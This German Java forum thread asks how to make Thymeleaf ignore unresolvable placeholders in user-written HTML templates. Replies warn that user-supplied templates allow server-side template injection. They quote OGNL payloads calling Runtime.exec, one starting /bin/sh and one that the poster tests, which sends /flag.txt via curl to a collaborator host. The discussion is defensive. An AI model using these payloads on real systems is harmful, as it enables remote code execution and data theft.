Frage Thymeleaf -> Fehler ignorieren und mit "" ersetzen?

[internet]

Ich habe länger im Internet nachgeschaut, aber finde leider keine Lösung...

Ich habe einen HTML Text als String, den mein User definieren kann.
Daher habe ich auch nicht 100% einen Einfluss, wie dieser HTML String aussieht.
Bevor ich die Verarbeitung mit Thymeleaf starte, parse ich erstmal alle Variablen mir in eine Liste.
Anschließend erstelle ich mir den Context und speichere dort die Variablen:

Context context = new Context();
context.setVariable("customer.", customer);

Nun habe ich einige Variablen innerhalb dem String. Manchmal gibt es aber Variablen, die nicht gefunden werden oder richtig aufgelöst werden können von Thymeleaf.
Eine Exception von Thymeleaf könnte ich fangen, allerdings wird der String nicht weiterverarbeitet um die Variablen zu ersetzen.

Wie schaffe ich es, dass die Variablen, die ein Fehler in Thymeleaf einfach entweder
a) Nicht ersetzt werden
oder
b) mit einem "" ersetzt werden?

public class Test {

    public static void main(String[] args) {

        // Erstelle einen String-Template-Resolver
        StringTemplateResolver templateResolver = new StringTemplateResolver();
        templateResolver.setTemplateMode(TemplateMode.HTML);

        // Logging ausstellen
        Logger thymeleafLogger = (Logger) LoggerFactory.getLogger("org.thymeleaf");
        thymeleafLogger.setLevel(Level.OFF);

        // Erstelle eine Template-Engine
        TemplateEngine templateEngine = new TemplateEngine();
        templateEngine.setTemplateResolver(templateResolver);

        // Deaktivieren Sie den Debug-Modus

        // Definiere den Template-String
//        String templateString = "<p>Hello, [[${name}]]!</p>";
        String templateString = "<p>Hello, {{jobSharingCompany..id}} !</p>";

        JobSharingCompanyDTO jobSharingCompany = new JobSharingCompanyDTO();
        jobSharingCompany.setId("1");
//        ObjectForReplacementObject replacementObject = new ObjectForReplacementObject();
//        PlaceholderFunctions.replaceObject(templateString, "customer.name", customer.getName(), replacementObject);

        // Erstelle einen Kontext mit den Variablen
        Context context = new Context();
//        context.setVariables(replacementObject.getReplacementVariableList());
        context.setVariable("jobSharingCompany.", jobSharingCompany);

        // Ersetze benutzerdefinierte Variablen-Syntax durch Standard-Syntax
        templateString = replaceCustomVariableSyntax(templateString);

        // Prozessiere das Template mit den Variablen
        StringWriter stringWriter = new StringWriter();

//        try {
            templateEngine.process(templateString, context, stringWriter);
//        } catch (Exception e) {
//            // Catch any exceptions and return an empty string
//        }

        // Gib das resultierende HTML aus
        System.out.println(stringWriter.toString());
    }

    // Methode zum Ersetzen der benutzerdefinierten Variablen-Syntax durch
    // Standard-Syntax
    private static String replaceCustomVariableSyntax(String templateString) {
        String output = templateString.replaceAll("\\{\\{([^}]+)\\}\\}", "[[\\${$1}]]");
        return output;
    }

}

Nun bekomme ich eben diese Exception:

Caused by: org.attoparser.ParseException: Exception evaluating OGNL expression: "jobSharingCompany..id" (template: "<p>Hello, [[${jobSharingCompany..id}]] !</p>" - line 1, col 13)

Nun sollte einfach das herauskommen:
Hello, !</p>

Wenn ich die Exception fange, erhalte ich aber:
Hello,

Also sprich der nachfolgende Text wird nicht mehr weiter verarbeitet...

Wie kann ich das lösen?
Gibt es eine Einstellung mit der ich die Fehler ignorieren kann?

Danke für die Hilfe

 

[Oneixee5]

Das habe ich im anderen Post schon gezeigt:
<p>Hello, <span th:text="${session.user.name}">Karl</span>!</p> hier ist Karl der Default.

Außerdem ist hier ein Fehler drin: {{jobSharingCompany..id}} - es gehört nur ein . da rein

 

[internet]

Außerdem ist hier ein Fehler drin: {{jobSharingCompany..id}} - es gehört nur ein . da rein

Das ist doch gerade das Problem...
1. Mein User definiert einen HTML Code und hat ein Fehler gemacht, statt: bpsw. {{jobSharingCompany.id}} macht er einen Punkt zu viel: {{jobSharingCompany..id}}

2. Nun startet der Prozess von Thymeleaf
3. Beim Ersetzen von {{jobSharingCompany..id}} schmeißt Thymeleaf aber nun einen Fehler und der ganze Prozess für das Ersetzen der Platzhalter wird abgebrochen

Was ich nun aber erreichen möchte ist, dass das Programm weiterläuft und eben die fehlgeschlagenen / nicht gefundene Platzhalter einfach mit einem leeren String ersetzt werden.

Wie erreiche ich das?

 

[thecain]

Bin jetzt nicht der Security Experte, aber ist das nicht eine riesen sicherheitlücke, wenn du den User direkt ein Thymeleaf Template einfügen lässt?

 

[internet]

Also vllt mal um klarzustellen: ich will es nicht verwenden um eine Webseite zu bauen. Ich will dadurch
A) PDF Dokument erstellen
B) Emailtext erstellen

Inwiefern hast du Bedenken, dass das eine Sicherheitslücke ist?

 

[Oneixee5]

Also vllt mal um klarzustellen: ich will es nicht verwenden um eine Webseite zu bauen. Ich will dadurch
A) PDF Dokument erstellen
B) Emailtext erstellen

Inwiefern hast du Bedenken, dass das eine Sicherheitslücke ist?

Man baut als Kunde in sein Template:
{{jobSharingCompany.costomers.jobSharingCompanys }}
Schon kenne ich alle Kunden-Unternehmen, bei welchen meine Kunden möglicherweise auch noch Arbeitskräfte mieten. Mal abgesehen davon ob man hier noch eine Schleife bräuchte. Man hangelt sich einfach durch die Objektstruktur und schaut mal was so rauspurzelt. Mit {{jobSharingCompany}} sieht man ja schon mal das ganze Objekt, wenn z.B. #toString() überschrieben ist.

 

[internet]

Man baut als Kunde in sein Template:
{{jobSharingCompany.costomers.jobSharingCompanys }}
Schon kenne ich alle Kunden-Unternehmen, bei welchen meine Kunden möglicherweise auch noch Arbeitskräfte mieten.

Aber dazu müsste doch "jobSharingCompany" erstmal die Property "costomers" haben?
jobSharingCompany ist eine DTO Klasse, somit gebe ich ja auch nur Informationen aus, die der User auch per API sehen würde

 

[mrBrown]

Inwiefern hast du Bedenken, dass das eine Sicherheitslücke ist?

Wenn Nutzer Methoden ausführen können ist das immer eine Sicherheitslücke, außer du kannst ziemlich eng über Allowlists definieren, was aufgerufen werden kann.

Thymeleaf scheint OGNL zu verwendet, und da scheinen statische Methoden nutzbar zu sein, möglich wäre dann vielleicht sowas: @java.lang.Runtime@getRuntime().exec(new String[] { "/bin/sh" }) (keine Ahnung ob die Syntax so passt oder das irgendwie verhindert wird)

 

[LimDul]

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection - mal zu Thymeleaf scrollen, da stehen ein paar Beispiele

However, the likelihood of this payload working is generally low. Thymeleaf's default configuration doesn't support dynamic template generation; templates must be predefined. Developers would need to implement their own TemplateResolver to create templates from strings on-the-fly, which is uncommon.

Hmmm ...

(...)

public class Test {

    public static void main(String[] args) {

        // Erstelle einen String-Template-Resolver
        StringTemplateResolver templateResolver = new StringTemplateResolver();

 

[internet]

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection - mal zu Thymeleaf scrollen, da stehen ein paar Beispiele



Hmmm ...

ja, mit dem StringTemplateResolver erhalte ich den HTML Code von einem String....
Alternative wäre eben direkt aus dem Ressource Folder mir die Datei zu laden...

 

[internet]

Aktuell sehe ich nur die Möglichkeit:

• Alle Platzhalter aus dem String herausparsen
• Jeden einzelnen Platzhalter validieren. Wenn kein Fehler, dann ersetzen. Wenn Fehler, dann mit "" ersetzen.

Wäre eben einige Male die auszuführen:

templateEngine.process(templateString, context, stringWriter);

 

[LimDul]

ja, mit dem StringTemplateResolver erhalte ich den HTML Code von einem String....
Alternative wäre eben direkt aus dem Ressource Folder mir die Datei zu laden...

Ja, und wenn der String vom User eingegeben wird, kann der diverse Dinge tun - wie z.B. Code ausführen.

 

[internet]

Ja, und wenn der String vom User eingegeben wird, kann der diverse Dinge tun - wie z.B. Code ausführen.

wie meinst du das konkret? Hast du ein Beispiel?

 

[LimDul]

Hier sind Beispiele: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#thymeleaf

 

[internet]

Hier sind Beispiele: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#thymeleaf

hm, also dass die Funktion 7x7 ausgeführt, mag ja noch OK sein...

Aber das habe ich mal getestet:

String input = "<p>Hello, [[${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}]] !</p>";

Hier passiert nichts...?

 

[internet]

Aber ich denke ich brauche hier sicherlich eine Whitelist....
Bspw. das würde funktionieren:

{{jobSharingCompany.getClass()}}